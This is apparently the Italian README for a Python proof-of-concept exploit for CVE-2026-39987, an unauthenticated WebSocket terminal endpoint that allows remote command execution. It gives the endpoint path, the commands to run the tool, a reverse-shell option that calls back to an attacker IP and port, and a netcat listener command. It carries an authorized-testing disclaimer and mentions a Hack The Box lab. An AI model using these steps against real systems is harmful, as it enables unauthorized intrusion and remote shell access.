
Proof-of-concept in Python per CVE-2026-39987, che sfrutta un endpoint terminale WebSocket non autenticato per ottenere l'esecuzione remota di comandi e l'accesso a una reverse shell.
Proof of Concept per CVE-2026-39987, che dimostra l'esecuzione remota di comandi attraverso l'endpoint terminale WebSocket vulnerabile.
Disclaimer: Questo PoC è destinato esclusivamente a test di sicurezza autorizzati e uso educativo. Utilizzalo solo contro sistemi di tua proprietà o per i quali hai esplicita autorizzazione a testare.
La vulnerabilità consente a un utente non autenticato di interagire con l'endpoint terminale WebSocket dell'applicazione ed eseguire comandi in remoto.
Il PoC si connette a:
wss://<target>/terminal/ws
e dimostra l'esecuzione di comandi attraverso la connessione WebSocket.
Il target utilizzato durante lo sviluppo/testing di questo PoC era un ambiente lab Hack The Box autorizzato.
websocket-clientInstalla la libreria richiesta:
pip3 install websocket-client
python3 test.py <domain>
Esempio:
python3 test.py somesite.com
Il PoC stabilisce la connessione WebSocket ed esegue un comando di test.
Il PoC supporta anche un'opzione reverse-shell:
python3 exploit.py <domain> --reverse-shell <IP> --port <PORT>
Esempio:
python3 exploit.py somesite.com --reverse-shell 10.10.14.5 --port 4444
Avvia il listener prima di eseguire il PoC:
nc -lvnp 4444
L'applicazione espone un endpoint terminale WebSocket senza richiedere autenticazione.
Il PoC:
La ws.recv() iniziale è importante perché il server invia il prompt della shell immediatamente dopo aver stabilito la connessione.